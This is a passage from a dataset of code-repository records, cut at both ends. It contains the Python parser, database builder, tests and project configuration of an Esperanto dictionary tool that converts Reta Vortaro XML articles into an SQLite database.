s.add(\"a\").add(\"b\", Format.TLD)\n s = expand_tld(s)\n assert s.string == \"ab\"\n assert s.format == {\"tld\": [(0, 2)]}\n\n\ndef test_expand_tld_start2():\n s = StringWithFormat()\n s.add(\",a\").add(\"b\", Format.TLD)\n s = expand_tld(s)\n assert s.string == \",ab\"\n assert s.format == {\"tld\": [(1, 3)]}\n\n\ndef test_expand_tld_end():\n s = StringWithFormat()\n s.add(\"a\", Format.TLD).add(\"b\")\n s = expand_tld(s)\n assert s.string == \"ab\"\n assert s.format == {\"tld\": [(0, 2)]}\n\n\ndef test_expand_tld_end2():\n s = StringWithFormat()\n s.add(\"a\", Format.TLD).add(\"b,\")\n s = expand_tld(s)\n assert s.string == \"ab,\"\n assert s.format == {\"tld\": [(0, 2)]}\n" }, { "alpha_fraction": 0.5357357859611511, "alphanum_fraction": 0.5374924540519714, "avg_line_length": 27.791908264160156, "blob_id": "e78164f3047bd726cd9d5b09ba86ac37462030d2", "content_id": "883eff8967e45d73b9e7d24e2b121931d0d1ac9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19934, "license_type": "no_license", "max_line_length": 88, "num_lines": 692, "path": "/eo_dicts/parser/revo.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import os.path\nimport fire\nimport functools\nimport xml.etree.ElementTree as ET\nfrom lxml import etree\nfrom ..utils import add_hats, letter_enumerate\nfrom .string_with_format import StringWithFormat, Format\nfrom abc import abstractmethod\nfrom typing import Union, Iterator, Optional, Type, TypeVar, cast\n\n\nT = TypeVar(\"T\", bound=\"Node\")\n\n\ndef remove_extra_whitespace(string: str) -> str:\n cleaned = \" \".join(string.split())\n # Preserve trailing whitespace\n if string and string[-1] == \" \":\n cleaned += \" \"\n if string and string[0] == \" \":\n cleaned = \" \" + cleaned\n return cleaned\n\n\nclass Node:\n def __init__(\n self, node: ET.Element, extra_info: Optional[dict[str, \"Node\"]] = None\n ):\n if extra_info is None:\n extra_info = {}\n self.parent: Optional[\"Node\"] = extra_info.get(\"parent\")\n self.children: list[Union[str, \"Node\"]]\n self.parse_children(node, extra_info)\n\n def __repr__(self):\n keys = \" \".join(\n \"{}={}\".format(k, repr(v))\n for k, v in self.__dict__.items()\n if k != \"parent\"\n )\n return \"<%s %s>\" % (self.__class__.__name__, keys)\n\n def parse_children(self, node: ET.Element, extra_info: dict[str, \"Node\"]) -> None:\n self.children = []\n if node.text and node.text.strip():\n self.children.append(remove_extra_whitespace(node.text))\n for child in node:\n if child.tag in [\"adm\", \"bld\", \"fnt\"]:\n if child.tail and child.tail.strip():\n self.children.append(remove_extra_whitespace(child.tail))\n continue\n tag_class = globals()[child.tag.title()]\n extra_info[\"parent\"] = self\n self.children.append(tag_class(child, extra_info))\n if child.tail and child.tail.strip():\n self.children.append(remove_extra_whitespace(child.tail))\n self.children = self.add_whitespace_nodes_to_children()\n # print(node.tag, '- children:', self.children)\n\n def add_whitespace_nodes_to_children(self) -> list[Union[str, \"Node\"]]:\n children = []\n for n, child in enumerate(self.children):\n children.append(child)\n if isinstance(child, Ref) and n < len(self.children) - 1:\n next_node = self.children[n + 1]\n # print(\"DETECTED ref, next:\", next_node, next_node.__class__)\n if isinstance(next_node, str) and next_node[0] not in \". ,;:\":\n children.append(\" \")\n elif not isinstance(next_node, str):\n children.append(\" \")\n elif (\n isinstance(child, Klr) and n < len(self.children) - 1 and child.children\n ):\n if (\n isinstance(child.children[-1], str)\n and child.children[-1][-1] != \" \"\n ):\n children.append(\" \")\n return children\n\n def get(self, *args: Type[T]) -> Iterator[T]:\n \"Get nodes based on their class\"\n for tag in self.children:\n if tag.__class__ in args:\n tag = cast(T, tag)\n yield tag\n\n def get_except(self, *args: Type[\"Node\"]) -> Iterator[Union[str, \"Node\"]]:\n for tag in self.children:\n if tag.__class__ not in args:\n yield tag\n\n def get_recursive(self, *args: Type[T]) -> Iterator[T]:\n if not hasattr(self, \"children\"):\n return\n for tag in self.children:\n if tag.__class__ in args:\n tag = cast(T, tag)\n yield tag\n elif isinstance(tag, str):\n continue\n else:\n for nested_tag in tag.get_recursive(*args):\n yield nested_tag\n\n def get_ancestor(self, *args: Type[T]) -> T:\n if not self.parent:\n raise\n elif self.parent.__class__ in args:\n parent = cast(T, self.parent)\n return parent\n return self.parent.get_ancestor(*args)\n\n @abstractmethod\n def to_text(self) -> StringWithFormat:\n pass\n\n def main_word(self) -> str:\n kap = getattr(self, \"kap\", \"\")\n if not kap:\n kap = self.get_ancestor(Art).kap[0]\n if kap is None:\n return \"\"\n return add_hats(kap.strip())\n\n def translations(self) -> dict[str, dict[str, dict[Optional[int], list[str]]]]:\n trds: dict[str, dict[str, dict[Optional[int], list[str]]]] = {}\n for tag in self.get_recursive(Trd, Trdgrp):\n if not isinstance(tag.parent, (Drv, Snc)):\n continue\n\n # N° of snc inside the Drv\n snc_index = None\n if isinstance(tag.parent, Snc):\n if not isinstance(tag.parent.parent, Drv):\n # TODO check if we are missing something\n # example: -ad (ad.xml and subdrv)\n continue\n drv = tag.parent.parent\n main_word = drv.main_word()\n\n sncs = [t for t in drv.children if isinstance(t, Snc)]\n # If there is only one Snc we don't need to specify a snc_index\n if len(sncs) > 1:\n snc_index = sncs.index(tag.parent) + 1\n else:\n main_word = tag.parent.main_word()\n if main_word not in trds:\n trds[main_word] = {}\n\n if not isinstance(tag, (Trd, Trdgrp)):\n raise\n lng, texts = tag.parse_trd()\n if isinstance(texts, str):\n texts = [texts]\n\n if lng not in trds[main_word]:\n trds[main_word][lng] = {}\n trds[main_word][lng][snc_index] = texts\n\n return trds\n\n\nclass TextNode(Node):\n # Format enum, can also be a list\n base_format: Union[list[Format], Format, None] = None\n\n def to_text(self) -> StringWithFormat:\n parts: list[StringWithFormat] = []\n for node in self.children:\n if isinstance(node, str):\n parts.append(StringWithFormat(node))\n else:\n parts.append(node.to_text())\n try:\n content = StringWithFormat()\n for part in parts:\n content += part\n # print(self.children, \"\\n\", parts, \"\\n\")\n return content.apply_format(self.base_format)\n except Exception:\n print(self.children)\n print(parts)\n raise\n\n\nclass Art(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n if extra_info is None:\n extra_info = {}\n assert node.tag == \"art\"\n rad = node.find(\"kap/rad\")\n if rad is None:\n raise\n tail = \"\"\n if rad.tail:\n tail = rad.tail.strip()\n self.kap = (rad.text, tail)\n extra_info[\"radix\"] = self.kap[0]\n super().__init__(node, extra_info)\n\n def derivations(self) -> Iterator[Union[\"Subart\", \"Drv\"]]:\n for subart in self.get(Subart):\n for drv in subart.derivations():\n yield drv\n for drv in self.get(Drv):\n yield drv\n assert not list(self.get(Snc))\n\n def to_text(self):\n raise Exception(\"Do not use Art.to_text() directly\")\n\n\nclass Kap(TextNode):\n pass\n\n\nclass Rad(TextNode):\n pass\n\n\nclass Gra(TextNode):\n pass\n\n\nclass Mlg(TextNode):\n pass\n\n\nclass Vspec(TextNode):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"(\").add(super().to_text()).add(\")\")\n\n\nclass Ofc(TextNode):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"\")\n\n\nclass Var(TextNode):\n pass\n\n\nclass Subart(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.mrk = \"\"\n self.kap = \"\"\n\n def derivations(self) -> Iterator[Union[\"Subart\", \"Drv\"]]:\n # Note that this method sometimes will return the subart node\n drvs = list(self.get(Drv))\n if len(drvs) == 1:\n self.kap = drvs[0].kap\n self.mrk = drvs[0].mrk\n yield self\n else:\n for drv in drvs:\n if not self.kap:\n self.kap = drv.kap\n self.mrk = drv.mrk\n yield drv\n # al.xml, last <subart> has <snc> as a direct child\n if not drvs and list(self.get(Snc)):\n yield self\n\n\nclass Drv(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n self.mrk = node.get(\"mrk\") or \"\"\n if not extra_info:\n extra_info = {}\n kap_node = node.find(\"kap\")\n assert kap_node is not None\n kap = Kap(kap_node, extra_info)\n self.kap = kap.to_text().string\n super().__init__(node, extra_info)\n self.parse_children(node, extra_info)\n\n def read_snc(self) -> list[StringWithFormat]:\n meanings = []\n n_sncs = len(list(self.get(Snc)))\n for n, snc in enumerate(self.get(Snc)):\n if n_sncs > 1:\n text = StringWithFormat(\"%s. \" % (n + 1,))\n text += snc.to_text()\n else:\n text = snc.to_text()\n meanings.append(text)\n return meanings\n\n def to_text(self) -> StringWithFormat:\n content = StringWithFormat()\n\n # Kap and Fnt ignored\n for node in self.get(Gra, Uzo, Dif, Ref):\n if isinstance(node, Ref) and node.tip != \"dif\":\n continue\n content += node.to_text()\n if isinstance(node, Gra):\n content += \" \"\n\n meanings = self.read_snc()\n\n for nn, subdrv in letter_enumerate(self.get(Subdrv)):\n text = subdrv.to_text()\n text.prepend(\"%s. \" % nn.upper())\n if nn == \"a\" and (meanings or len(content)):\n text.prepend(\"\\n\\n\")\n meanings.append(text)\n\n content += StringWithFormat.join(meanings, \"\\n\\n\")\n\n # Renaming node2 to node causes issues with mypy\n for node2 in self.get_except(Subdrv, Snc, Gra, Uzo, Fnt, Kap, Dif, Mlg):\n if isinstance(node2, Ref) and node2.tip == \"dif\":\n continue\n if isinstance(node2, str):\n # Nodes added by hand in add_whitespace_nodes_to_children\n content += node2\n else:\n content += node2.to_text()\n\n return content\n\n\nclass Subdrv(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.parse_children(node, extra_info)\n\n def to_text(self) -> StringWithFormat:\n content = StringWithFormat()\n\n # Fnt omitted\n for node in self.get(Dif, Gra, Uzo, Ref):\n if isinstance(node, Ref) and node.tip != \"dif\":\n continue\n content += node.to_text()\n\n for n, snc in enumerate(self.get(Snc), 1):\n text = snc.to_text()\n text.prepend(\"%s. \" % n)\n text.prepend(\"\\n\\n\")\n content += text\n\n for text_node in self.get_except(Snc, Gra, Uzo, Fnt, Dif, Ref):\n if isinstance(text_node, Ref) and text_node.tip == \"dif\":\n continue\n if isinstance(text_node, str):\n raise\n content += text_node.to_text()\n return content\n\n\nclass Snc(Node):\n def __init__(self, node, extra_info=None):\n self.mrk = node.get(\"mrk\")\n if not extra_info:\n extra_info = {}\n # example: snc without mrk but drv has it (see zoni in zon.xml)\n self.mrk = self.mrk or extra_info[\"radix\"]\n super().__init__(node, extra_info)\n\n def to_text(self) -> StringWithFormat:\n content = StringWithFormat()\n\n # Fnt ignored\n for node in self.get(Gra, Uzo, Dif, Ref):\n if isinstance(node, Ref) and node.tip != \"dif\":\n continue\n content += node.to_text()\n if isinstance(node, Gra):\n content += \" \"\n\n if list(self.get(Subsnc)):\n content += \"\\n\\n\"\n subs = []\n for n, subsnc in letter_enumerate(self.get(Subsnc)):\n text = subsnc.to_text()\n text.prepend(\"%s) \" % n)\n subs.append(text)\n content += StringWithFormat.join(subs, \"\\n\\n\")\n\n # Renaming node2 to node causes issues with mypy\n for node2 in self.get_except(Gra, Uzo, Fnt, Dif, Subsnc):\n if isinstance(node2, Ref) and node2.tip == \"dif\":\n continue\n if isinstance(node2, str):\n # Nodes added by hand in add_whitespace_nodes_to_children\n content += node2\n else:\n content += node2.to_text()\n\n return content\n\n\nclass Subsnc(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.mrk = node.get(\"mrk\")\n\n\nclass Uzo(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.tip = node.get(\"tip\")\n if self.tip == \"fak\":\n self.base_format = Format.UZO_FAKO\n\n def to_text(self) -> StringWithFormat:\n text = super().to_text()\n if self.tip == \"stl\":\n mapping = {\n \"FRAZ\": \"(frazaĵo)\",\n \"FIG\": \"(figure)\",\n \"VULG\": \"(vulgare)\",\n \"RAR\": \"(malofte)\",\n \"POE\": \"(poezie)\",\n \"ARK\": \"(arkaismo)\",\n \"EVI\": \"(evitinde)\",\n \"KOMUNE\": \"(komune)\",\n \"NEO\": \"(neologismo)\",\n }\n text = StringWithFormat(mapping.get(text.string, text.string))\n return text + \" \"\n\n\nclass Dif(TextNode):\n pass\n\n\nclass Tezrad(Node):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"\")\n\n\n# TODO link to url\nclass Url(TextNode):\n pass\n\n\n# TODO link\nclass Lstref(TextNode):\n pass\n\n\nclass Trd(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.lng = node.get(\"lng\") or \"\"\n\n # abel.xml has a trd inside a dif\n def to_text(self) -> StringWithFormat:\n if isinstance(self.parent, Dif):\n return super().to_text()\n return StringWithFormat(\"\")\n\n def parse_trd(self) -> tuple[str, str]:\n return (self.lng, super().to_text().string)\n\n\nclass Trdgrp(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n self.lng = node.get(\"lng\") or \"\"\n super().__init__(node, extra_info)\n\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"\")\n\n def parse_trd(self) -> tuple[str, list[str]]:\n return (self.lng, [trd.parse_trd()[1] for trd in self.get(Trd)])\n\n\nclass Ref(TextNode):\n @staticmethod\n def add_arrow(tip: Optional[str], text: StringWithFormat) -> StringWithFormat:\n if not tip:\n return text\n symbol = \"→\"\n if tip == \"dif\":\n symbol = \"=\"\n content = StringWithFormat(symbol + \" \")\n content += text\n return content\n\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.tip = node.get(\"tip\")\n\n def to_text(self) -> StringWithFormat:\n if isinstance(self.parent, (Dif, Rim, Ekz, Klr)):\n return super().to_text()\n return Ref.add_arrow(self.tip, super().to_text())\n\n # symbol = \"→\"\n # if self.tip == 'malprt':\n # symbol = \"↗\"\n # elif self.tip == \"prt\":\n # symbol = \"↘\"\n # content = StringWithFormat(symbol+' ')\n # content += super().to_text()\n # return content\n\n\nclass Refgrp(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.tip = node.get(\"tip\")\n\n def to_text(self) -> StringWithFormat:\n if isinstance(self.parent, (Dif, Rim, Ekz, Klr)):\n return super().to_text()\n return Ref.add_arrow(self.tip, super().to_text())\n\n\nclass Sncref(TextNode):\n pass\n\n\nclass Ekz(TextNode):\n base_format = Format.EKZ\n\n def to_text(self) -> StringWithFormat:\n content = super().to_text()\n content.prepend(\"\\n\")\n return content\n\n\nclass Tld(Node):\n def __init__(self, node: ET.Element, extra_info=None):\n self.radix = \"\"\n self.lit = node.get(\"lit\") or \"\"\n if extra_info:\n self.radix = extra_info.get(\"radix\") or \"\"\n self.radix = self.radix.strip()\n self.parent = extra_info.get(\"parent\")\n\n def to_text(self) -> StringWithFormat:\n content = None\n if self.lit and self.radix:\n content = StringWithFormat(self.lit + self.radix[1:])\n else:\n content = StringWithFormat(self.radix or \"-----\")\n if isinstance(self.parent, Ekz) or (\n self.parent and isinstance(self.parent.parent, Ekz)\n ):\n content = content.apply_format(Format.TLD)\n return content\n\n\n# found in amik.xml\nclass Klr(TextNode):\n pass\n\n\nclass Rim(TextNode):\n def __init__(self, node: ET.Element, extra_info=None):\n super().__init__(node, extra_info)\n self.num = node.get(\"num\") or \"\"\n\n def to_text(self) -> StringWithFormat:\n string = super().to_text()\n if self.num:\n content = StringWithFormat().add_bold(\"\\n\\nRim. %s: \" % self.num)\n content += string\n return content\n return StringWithFormat().add_bold(\"\\n\\nRim. \").add(string)\n\n\nclass Aut(TextNode):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"[\").add(super().to_text()).add(\"]\")\n\n\nclass Fnt(Node):\n def to_text(self) -> StringWithFormat:\n return StringWithFormat(\"\")\n\n\n# found in zon.xml\nclass Frm(TextNode):\n pass\n\n\n# TODO sub format (seen en acetil.xml)\nclass Sub(TextNode):\n pass\n\n\nclass Sup(TextNode):\n pass\n\n\nclass K(TextNode):\n pass\n\n\nclass G(TextNode):\n pass\n\n\n# TODO bold format (example: abstrakta)\nclass Em(TextNode):\n pass\n\n\nclass Ctl(TextNode):\n pass\n\n\nclass Ind(TextNode):\n pass\n\n\nclass Mll(TextNode):\n pass\n\n\nclass Nom(TextNode):\n pass\n\n\nclass Esc(TextNode):\n pass\n\n\nclass Nac(TextNode):\n pass\n\n\nclass Baz(TextNode):\n pass\n\n\n# seen in dank.xml, danke al\nclass Mis(TextNode):\n pass\n\n\n# TODO strikethrough\nclass Ts(TextNode):\n pass\n\n\n# https://github.com/sstangl/tuja-vortaro/blob/master/revo/convert-to-js.py\[email protected]\ndef entities_dict() -> dict[str, str]:\n entities: dict[str, str] = {}\n\n base_dir = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"revo\", \"dtd\")\n with open(os.path.join(base_dir, \"vokosgn.dtd\"), \"rb\") as f:\n dtd = etree.DTD(f)\n for entity in dtd.iterentities():\n entities[entity.name] = entity.content\n\n with open(os.path.join(base_dir, \"vokourl.dtd\"), \"rb\") as f:\n dtd = etree.DTD(f)\n for entity in dtd.iterentities():\n entities[entity.name] = entity.content\n\n with open(os.path.join(base_dir, \"vokomll.dtd\"), \"rb\") as f:\n dtd = etree.DTD(f)\n for entity in dtd.iterentities():\n entities[entity.name] = entity.content\n return entities\n\n\ndef parse_article(filename: str) -> Art:\n with open(filename) as f:\n article = f.read()\n\n xml_parser = ET.XMLParser()\n for entity, value in entities_dict().items():\n xml_parser.entity[entity] = value\n tree = ET.fromstring(article, parser=xml_parser)\n\n art = tree.find(\"art\")\n if not art:\n raise Exception(\"XML file does not contain <art> tag!\")\n return Art(art)\n\n\ndef main(word: str):\n art = parse_article(\"xml/%s.xml\" % word)\n print(art)\n print()\n print(art.to_text())\n\n\nif __name__ == \"__main__\":\n fire.Fire(main)\n" }, { "alpha_fraction": 0.6394850015640259, "alphanum_fraction": 0.6394850015640259, "avg_line_length": 28.125, "blob_id": "5f5142c380c9697277910027da2b8cf500090264", "content_id": "bbd206450f8087a557cc754db4aa220350a576b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 65, "num_lines": 8, "path": "/eo_dicts/tests/test_utils.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "from ..utils import add_hats\n\n\ndef test_add_hats():\n assert add_hats(\"\") == \"\"\n assert add_hats(\"saluton\") == \"saluton\"\n assert add_hats(\"sercxi\") == \"serĉi\"\n assert add_hats(\"CxSxGxJxHxUxcxsxgxjxhxux\") == \"ĈŜĜĴĤŬĉŝĝĵĥŭ\"\n" }, { "alpha_fraction": 0.5424151420593262, "alphanum_fraction": 0.5439121723175049, "avg_line_length": 27.959537506103516, "blob_id": "8c11542a7a4173048ce6472cc52f839300f7170f", "content_id": "ce6561e6e6b59183b3ac5531f60d33d996ca1476", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10022, "license_type": "no_license", "max_line_length": 95, "num_lines": 346, "path": "/eo_dicts/process_revo.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import os\nimport sqlite3\nimport glob\nimport itertools\nimport json\nfrom typing import TypedDict, Optional\n\nfrom .utils import get_languages, get_disciplines, output_dir\nfrom .parser import revo\nfrom .parser.string_with_format import expand_tld\n\n\nclass DefinitionDict(TypedDict):\n article_id: int\n word: str\n mark: str\n definition: str\n format: str\n trads: dict\n position: int\n definition_id: Optional[int]\n\n\nclass EntryDict(TypedDict):\n article_id: int\n word: str\n definition: DefinitionDict\n\n\ndef insert_translations(trads: list[dict], cursor: sqlite3.Cursor) -> None:\n # flatten\n all_trans: list[dict] = []\n for translation in trads:\n for snc_index, words in translation[\"data\"].items():\n for word in words:\n all_trans.append(\n dict(translation=word, snc_index=snc_index, **translation)\n )\n\n all_trans.sort(\n key=lambda x: (\n x[\"lng\"],\n x[\"translation\"],\n x[\"snc_index\"] is None,\n x[\"snc_index\"],\n )\n )\n\n for translation in all_trans:\n cursor.execute(\n \"\"\"INSERT INTO translations_{code}\n (definition_id, snc_index, word, translation)\n VALUES (?,?,?,?)\"\"\".format(\n code=translation[\"lng\"]\n ),\n (\n translation[\"row_id\"],\n translation[\"snc_index\"],\n translation[\"word\"],\n translation[\"translation\"],\n ),\n )\n\n\ndef create_db(output_db: str) -> sqlite3.Connection:\n base_dir = os.path.dirname(__file__)\n db_filename = os.path.join(base_dir, output_db)\n try:\n os.remove(db_filename)\n except Exception:\n pass\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n c.execute(\n \"\"\"\n CREATE TABLE words (\n id integer primary key,\n word text,\n definition_id integer\n )\n \"\"\"\n )\n # position: relative order inside the article\n c.execute(\n \"\"\"\n CREATE TABLE definitions (\n id integer primary key,\n article_id integer,\n words text,\n mark text,\n position integer,\n definition text,\n format text\n )\n \"\"\"\n )\n\n return conn\n\n\ndef create_langs_tables(cursor: sqlite3.Cursor, entries_per_lang: dict) -> None:\n cursor.execute(\n \"\"\"\n CREATE TABLE languages (\n id integer primary key,\n code text,\n name text,\n num_entries integer\n )\n \"\"\"\n )\n\n lang_names = {\n lang_def[\"code\"]: (order, lang_def[\"name\"])\n for order, lang_def in enumerate(get_languages())\n }\n # Normal sort won't consider ĉ, ŝ, ...,\n # get_languages() gives the correct order\n langs = sorted(entries_per_lang.keys(), key=lambda x: lang_names[x][0])\n\n for lang in langs:\n cursor.execute(\n \"\"\"\n CREATE TABLE translations_{lang} (\n id integer primary key,\n definition_id integer,\n snc_index integer,\n word text,\n translation text\n )\n \"\"\".format(\n lang=lang\n )\n )\n\n cursor.execute(\n \"\"\"\n INSERT INTO languages (code, name, num_entries)\n VALUES (?, ?, ?)\n \"\"\",\n (lang, lang_names[lang][1], entries_per_lang[lang]),\n )\n\n\ndef create_disciplines_tables(cursor: sqlite3.Cursor) -> None:\n cursor.execute(\n \"\"\"\n CREATE TABLE disciplines (\n id integer primary key,\n code text,\n name text\n )\n \"\"\"\n )\n\n for code, discipline in get_disciplines().items():\n cursor.execute(\n \"INSERT INTO disciplines (code, name) VALUES (?, ?)\", (code, discipline)\n )\n\n\ndef create_version_table(cursor: sqlite3.Cursor) -> None:\n base_dir = os.path.dirname(__file__)\n version = \"\"\n with open(os.path.join(base_dir, \"..\", \"revo\", \"VERSION\"), \"r\") as f:\n version = f.read().strip()\n\n cursor.execute(\"CREATE TABLE version (id text primary key)\")\n cursor.execute(\"INSERT INTO version (id) values (?)\", (version,))\n\n\ndef parse_article(filename: str, num_article: int, verbose=False) -> list[EntryDict]:\n art = None\n try:\n art = revo.parse_article(filename)\n except Exception:\n print(\"Error parsing %s\" % filename)\n raise\n\n found_words = []\n entries: list[EntryDict] = []\n has_subart = False\n drvs = list(art.derivations())\n for pos, drv in enumerate(drvs, 1):\n if isinstance(drv, revo.Subart):\n has_subart = True\n\n if pos == len(drvs) and has_subart and not drv.kap:\n # first subart contains the whole article,\n # so this snc will not be needed\n continue\n\n main_word_txt = drv.main_word()\n found_words.append(main_word_txt)\n row_id = None\n content = drv.to_text()\n content = expand_tld(content)\n assert \"StringWithFormat\" not in content.string\n\n # definition_id will be used to check whether the definition is already in the database\n definition: DefinitionDict = dict(\n article_id=num_article,\n word=main_word_txt,\n mark=drv.mrk,\n definition=content.string,\n format=content.encode_format(),\n trads=drv.translations(),\n position=pos,\n definition_id=None,\n )\n # note that before inserting the entries will be sorted by 'word'\n first_word = True\n for word in main_word_txt.split(\", \"):\n word = word.strip()\n # \"definition\" dict is shared between entries in this loop\n entries.append(\n dict(article_id=num_article, word=word, definition=definition)\n )\n if first_word:\n first_word = False\n # Avoid duplication of translations\n definition = definition.copy()\n definition[\"trads\"] = {}\n\n if verbose:\n print(filename, drv.mrk, row_id)\n else:\n print(filename, drv.mrk)\n\n return entries\n\n\ndef create_index(cursor: sqlite3.Cursor) -> None:\n cursor.execute(\"CREATE INDEX index_word_words ON words (word)\")\n cursor.execute(\"CREATE INDEX index_definition_id_words ON words (definition_id)\")\n\n\ndef write_stats(entries_per_lang: dict) -> None:\n base_dir = os.path.dirname(__file__)\n with open(os.path.join(base_dir, \"..\", \"stats.json\"), \"w\") as f:\n json.dump(entries_per_lang, f, ensure_ascii=False, indent=4)\n\n\ndef insert_entries(\n entries: list[EntryDict], cursor: sqlite3.Cursor, min_entries_to_include_lang: int\n) -> None:\n entries = sorted(entries, key=lambda x: x[\"word\"].lower())\n translations = []\n for entry in entries:\n print(entry[\"word\"])\n\n if not entry[\"definition\"][\"definition_id\"]:\n definition = entry[\"definition\"]\n cursor.execute(\n \"\"\"INSERT INTO definitions (\n article_id, words, mark, position, definition, format)\n values (?, ?, ?, ?, ?, ?)\"\"\",\n (\n definition[\"article_id\"],\n definition[\"word\"],\n definition[\"mark\"],\n definition[\"position\"],\n definition[\"definition\"],\n definition[\"format\"],\n ),\n )\n entry[\"definition\"][\"definition_id\"] = cursor.lastrowid\n\n assert entry[\"definition\"][\"definition_id\"] is not None\n def_id: int = entry[\"definition\"][\"definition_id\"]\n\n cursor.execute(\n \"INSERT into words (word, definition_id) values (?, ?)\",\n [entry[\"word\"], def_id],\n )\n\n trads = entry[\"definition\"][\"trads\"]\n if trads:\n for word, more_trads in trads.items():\n for lng, trans_data in more_trads.items():\n translations.append(\n dict(row_id=def_id, word=word, lng=lng, data=trans_data)\n )\n\n translations = sorted(translations, key=lambda x: x[\"lng\"])\n entries_per_lang = {}\n for lng, g in itertools.groupby(translations, key=lambda x: x[\"lng\"]):\n count = len(list(g))\n if count >= min_entries_to_include_lang:\n print(lng, count)\n entries_per_lang[lng] = count\n\n write_stats(entries_per_lang)\n\n create_langs_tables(cursor, entries_per_lang)\n translations = [t for t in translations if t[\"lng\"] in entries_per_lang]\n insert_translations(translations, cursor)\n\n\ndef main(\n word: Optional[str],\n xml_file: Optional[str],\n output_db: str,\n limit: Optional[int],\n verbose: bool,\n dry_run: bool,\n min_entries_to_include_lang: int,\n) -> None:\n\n conn = create_db(os.path.join(output_dir(), output_db))\n cursor = conn.cursor()\n\n if not dry_run:\n create_disciplines_tables(cursor)\n\n entries: list[EntryDict] = []\n try:\n files = []\n if xml_file:\n files = [xml_file]\n else:\n base_dir = os.path.dirname(__file__)\n path = os.path.join(base_dir, \"..\", \"revo\", \"xml\", \"*.xml\")\n files = glob.glob(path)\n files.sort()\n\n num_article = 1\n for filename in files:\n if word and word not in filename:\n continue\n parsed_entries = parse_article(filename, num_article, verbose)\n entries += parsed_entries\n num_article += 1\n\n if limit and num_article >= limit:\n break\n\n if not dry_run:\n insert_entries(entries, cursor, min_entries_to_include_lang)\n create_index(cursor)\n create_version_table(cursor)\n finally:\n if not dry_run:\n conn.commit()\n cursor.close()\n conn.close()\n" }, { "alpha_fraction": 0.5572998523712158, "alphanum_fraction": 0.5808477401733398, "avg_line_length": 23.5, "blob_id": "1b5430ba32204db6d6428b414a6caafe297659b6", "content_id": "1124afe216b5796b5a733cbfdd9921ffdea5afe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1279, "license_type": "no_license", "max_line_length": 81, "num_lines": 52, "path": "/eo_dicts/tests/test_process.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import os\nimport sqlite3\nimport pytest\nfrom ..utils import output_dir\nfrom ..cli import Vortaro\n\nTEST_DB = \"test.db\"\nXML_BASE_DIR = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"revo\", \"xml\")\n\n\n# source: https://github.com/pallets/click/issues/737#issuecomment-309231467\[email protected]\ndef vortaro():\n return Vortaro()\n\n\ndef db_file():\n return os.path.join(output_dir(), TEST_DB)\n\n\ndef test_process_subart(vortaro):\n vortaro.process_revo(\n output_db=TEST_DB, xml_file=os.path.join(XML_BASE_DIR, \"an.xml\")\n )\n\n conn = sqlite3.connect(db_file())\n cursor = conn.cursor()\n res = cursor.execute(\"SELECT words, mark, position from definitions\")\n assert list(res) == [\n (\"-an\", \"an.0\", 1),\n (\"anaro\", \"an.0aro\", 3),\n (\"aniĝi\", \"an.0igxi\", 4),\n (\"ano\", \"an.0o\", 2),\n ]\n\n\ndef test_process_subart_2(vortaro):\n vortaro.process_revo(\n output_db=TEST_DB, xml_file=os.path.join(XML_BASE_DIR, \"al.xml\")\n )\n\n conn = sqlite3.connect(db_file())\n cursor = conn.cursor()\n res = cursor.execute(\"SELECT word, definition_id from words\")\n assert list(res) == [\n (\"al\", 1),\n (\"aligi\", 2),\n (\"aliĝi\", 3),\n (\"aliĝilo\", 4),\n (\"malaliĝi\", 5),\n (\"realiĝi\", 6),\n ]\n" }, { "alpha_fraction": 0.6882352828979492, "alphanum_fraction": 0.7029411792755127, "avg_line_length": 20.25, "blob_id": "8ab814bf2f98a13350df06a8636052f6200a8f6d", "content_id": "509051720dd4cb78a61b6ff5476987c92778bd5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 340, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/pyproject.toml", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "[build-system]\nrequires = [\"setuptools\"]\nbuild-backend = \"setuptools.build_meta\"\n\n[project]\nname = \"eo_dicts\"\nversion = \"0.1\"\nrequires-python = \">=3.11\"\n\n[tool.setuptools.packages.find]\ninclude = [\"eo_dicts\"]\nexclude = [\"eo_dicts.tests\"]\n\n[project.scripts]\nprocess_revo = \"eo_dicts.process_revo:main\"\npraktika_vortaro = \"eo_dicts.cli:main\"\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 13.125, "blob_id": "ad7588e1223f3484c63408692dce6f1cba3c19a5", "content_id": 